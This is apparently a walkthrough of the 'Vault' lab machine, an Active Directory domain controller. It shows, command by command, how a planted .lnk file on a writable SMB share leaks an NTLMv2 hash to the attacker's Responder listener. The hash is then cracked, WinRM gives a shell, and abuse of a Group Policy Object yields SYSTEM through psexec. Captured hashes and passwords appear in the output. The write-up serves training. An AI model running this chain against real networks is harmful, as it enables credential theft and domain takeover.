Machine Information
- Machine Name: Vault
- Machine Difficulty: Hard
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
Nmap scan report for 192.168.135.172
Host is up, received user-set (0.014s latency).
Scanned at 2024-10-19 20:46:55 +08 for 191s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-19 12:48:25Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-19T12:49:25+00:00
|_ssl-date: 2024-10-19T12:50:05+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Issuer: commonName=DC.vault.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T01:09:06
| Not valid after: 2025-01-31T01:09:06
| MD5: b115:10c2:2431:251b:edde:729e:549f:dbf6
| SHA-1: f5d0:7155:0c42:44f2:f6e3:b37d:60a7:684c:cef1:1f7c
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQVLleRXjtjqtBTLcyMopEMjANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw9EQy52YXVsdC5vZmZzZWMwHhcNMjQwODAxMDEwOTA2WhcNMjUw
| MTMxMDEwOTA2WjAaMRgwFgYDVQQDEw9EQy52YXVsdC5vZmZzZWMwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNPQi2wokDysWzr7+pDXUQf7colxclkZEO
| waXKerdwYL2ZbL6E1R35vs5a6/P6ljjvAIzNca1AwBfJRwngyejbreAnymm4tYBX
| Y7KdWS49XQM+MLlrhiXEdUoKMKGusZ3lbp1O1XIEG6n9WbRNa70FNPQ38ZBCaV68
| 5Z8M3mIrwn6tBgSDwHxWniPSxOMOqtuOhbhCil4FRxmzdu7UaLk73yiuq0Y+rMCu
| QIKpjtexGzmU+LqtgbyDURpiAEFdFbruDnpAGqHaTVicdRUOhqqZVbtjyhrAUDJ9
| ioIqb0GV8dUavW++B53rmwgvdd8rWGXiEhQnZnhHKH1EXdFvBfARAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAemrZ0Qs8ZSc+eRsYKzErRVir7WXdKgLX7NFtqiv2gVwGmNSEtz3K3I1T
| IDkTYRD7ITxkFAVCeTSUo6OkMsqoLZQxyJHc3C3u7fkyCkcydlSiKfarx2p23yfx
| tk6e4CerhaYq59TSEXNG5/k7/rteodLcu4IkOd2vsOdotbFJNrBYUlr/B+Rj0HvP
| VUhkJP2b3vvR5sUSzk0NGDoX0U8bJdK4ZvUxuN9gor9tVcpwRRIa0Byhp1ZclIlI
| BPMBkPHBmpVqoDAptOvu2YWsbhOQrM8lPVRsqDEA0XbTB+D4ALg0I9Cy3TsIoPXm
| sKTR77ef8S36cwf5aWh6z/uki96PeA==
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49703/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
I started out looking into smb port as that’s the only hope I have.
Port 139/445
I tried using the default guest user and password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
smbmap -H 192.168.135.172 -u "Guest" -p ""
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.172:445 Name: dc.vault.offsec Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DocumentsShare READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
I then look into the DocumentsShare as it seems to be the only useful directory which could write.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
smbmap -H 192.168.135.172 -u "Guest" -p "" -r DocumentsShare
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.172:445 Name: dc.vault.offsec Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DocumentsShare READ, WRITE
./DocumentsShare
dr--r--r-- 0 Sat Oct 19 23:01:04 2024 .
dr--r--r-- 0 Sat Oct 19 23:01:04 2024 ..
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
I then stucked here and managed to get some useful information from this article and this tool. I then try to use the tool to generate a .lnk file.
1
2
3
python ntlm_theft.py -g lnk -s 192.168.45.235 -f test
Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.
After the file is created, I set up responder to capture the hash and upload the file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smbmap -H 192.168.135.172 -u "Guest" -p "" --upload test/test.lnk DocumentsShare/test.lnk
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting upload: test/test.lnk (2164 bytes)
[+] Upload complete..
[*] Closed 1 connections
Once the file is uploaded, I received the hashes immediately.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
responder -I tun0 -dvw
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.135.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:dffac804bc142d1a:9B831C630A0CE9CD8A6ED5DF2D33FCDC:010100000000000000089D717B22DB015BBB1241E5B9989B0000000002000800350056003600410001001E00570049004E002D00330045003100330055004900520052003400300
0420004003400570049004E002D00330045003100330055004900520052003400300042002E0035005600360041002E004C004F00430041004C000300140035005600360041002E004C004F00430041004C000500140035005600360041002E004C004F00430041004C000700080000089D717B22DB0
1060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E00320
0330035000000000000000000
Now that I have the hash, time to crack it.
1
2
3
4
5
6
7
8
9
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM (anirudh)
1g 0:00:00:08 DONE (2024-10-19 23:08) 0.1236g/s 1311Kp/s 1311Kc/s 1311KC/s Seifer@14..Sda10184
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Now that I have a password, I tried to look into the services that I have access using netexec.
1
2
3
netexec winrm 192.168.135.172 -u "anirudh" -p "SecureHM"
WINRM 192.168.135.172 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:vault.offsec)
WINRM 192.168.135.172 5985 DC [+] vault.offsec\anirudh:SecureHM (Pwn3d!)
With the Pwn3d! message, I could gain access to the shell.
Port 5985
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.135.172 -u anirudh -p SecureHM
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh
Now that I have shell but not administrator account, time to privilege escalation.
Privilege Escalation
As usual, just run winpeas and bloodhound-python if this is AD. After reading the information, here’s something interesting provided by bloodhound.
The current user has WriteDacl, WriteOwner and GenericWrite to DEFAULT DOMAIN POLICY GPO. After understanding it, It seems like I could use pyGPOAbuse.py to get administrator shell. The GPO id could be found in bloodhound when clicking the DEFAULT DOMAIN POLICY.
1
2
3
python pygpoabuse.py vault.offsec/anirudh:SecureHM -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9
SUCCESS:root:ScheduledTask TASK_71a4800b created!
[+] ScheduledTask TASK_71a4800b created!
It seems like it has successfully created a task. According to this article, the task will add user john into local administrators group. I then check if the user is added to the group.
1
2
3
netexec smb 192.168.135.172 -u "john" -p "H4x00r123.."
SMB 192.168.135.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.135.172 445 DC [+] vault.offsec\john:H4x00r123.. (Pwn3d!)
Yeap, the user john was added into the machine. Since it is Pwn3d! with smb port, I could just get administrator shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
impacket-psexec vault.offsec/john:'H4x00r123..'@192.168.135.172
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.135.172.....
[*] Found writable share ADMIN$
[*] Uploading file XGHpeSsX.exe
[*] Opening SVCManager on 192.168.135.172.....
[*] Creating service RPDo on 192.168.135.172.....
[*] Starting service RPDo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Things I learned from this machine
- another new method of stealing NTLMv2 hashes
- bloodhound save the day
- using this
pyGPOabuse.pywithout the need of shell is amazing